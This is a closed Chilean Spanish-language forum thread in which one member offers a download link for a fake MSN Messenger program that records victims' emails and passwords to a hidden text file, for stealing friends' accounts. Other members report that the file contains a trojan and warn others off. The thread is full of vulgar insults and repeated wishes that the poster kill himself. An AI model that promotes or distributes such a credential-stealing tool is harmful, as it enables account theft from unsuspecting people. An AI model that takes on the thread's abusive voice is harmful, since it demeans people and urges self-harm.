• ¿Quieres apoyar a nuestro foro haciendo una donación?, entra aquí.

roba claves msn muahahahha

Estado
No está abierto para más respuestas.
fleto maracxao la huea trae un troyano menos mal que tengo el pc congelao tonto maraco que te gusta el pico
 
aweonao rql esa mierda q pasai ta lleno de troyan rql menos malq tengo wen antivirus o te cago la ip sapo y la reconchatumare XD
 
jajajja la wea vieja y el weon le pone al tema una risa diabolica q es saco e huea
 
jajajajajaja que wena socio se paso

jajajja a webiar un rato con este programa

jajajaaj
 
jaujuajua la wea vieja ctm
una vez io postie esto y me putiaron ma ke la rexuxa
y jue hace como un año :viejo:
 
pff la wea y a quien le interes kliao si es por eso instalo un keylogger
 
Socito, viejo, pana, compadre, colega...

Vaya a ver tele mejor, ud tiene menos presencia que cenicero de moto.
 
PIPOX_AD_HOK dijo:
uta aca les dejo el ratero msn sirve la wea.. lo hice en los pc de la U.. y uta comprobado sirve.. un metodo medio lamer si de hackiar.. pero no se po si te keris hackiar au amigo que se **** a tu pc.. o le keris scar un cotacto de mina rica :malosi:

en que consiste:
consiste en un simple progra.. que simula ser un msn.. osea un msn falso .. el wn pone la clave y el correo .. y pone conectar.. pero la wea no se conecta y la clave y el mail keda en un archivo en la carpeta

c:\windows\sistemwin.txt

pruebenlo

comprobado!

la unica wea es que la victima debe estar en tu pc pa caer .. pero es lo ke hay..
ya puteeenme no ma :(

aca el link
http://rapidshare.de/files/33114343/RateroMSN.rar

aweonao reculiao xupa vergaz hijo de la gran puta maraca ramera prostituta q te pario, tu caga de archivo tenia un virus q gracias a mi bien ponderado karpersky detecto.


eri una mierda de persona pa subir weas con virus


matate y le aras un bien a la humanidad

aweonao qliao
 
PIPOX_AD_HOK dijo:
uta aca les dejo el ratero msn sirve la wea.. lo hice en los pc de la U.. y uta comprobado sirve.. un metodo medio lamer si de hackiar.. pero no se po si te keris hackiar au amigo que se **** a tu pc.. o le keris scar un cotacto de mina rica :malosi:

en que consiste:
consiste en un simple progra.. que simula ser un msn.. osea un msn falso .. el wn pone la clave y el correo .. y pone conectar.. pero la wea no se conecta y la clave y el mail keda en un archivo en la carpeta

c:\windows\sistemwin.txt

pruebenlo

comprobado!

la unica wea es que la victima debe estar en tu pc pa caer .. pero es lo ke hay..
ya puteeenme no ma :(

aca el link
http://rapidshare.de/files/33114343/RateroMSN.rar


eri una mierda reconxetumare tu caga de archivo tenia un virus q mi bien ponderado karpersky detecto...

aweonaos como vo deberian suicidarc para ahcer el bien a la humanidad hijo de la puta toplera...


aweonaooooooooooooooooooooooooooooooooooooooo


y no bajen esa wea pq tiene virus
 
Estado
No está abierto para más respuestas.
Volver
Arriba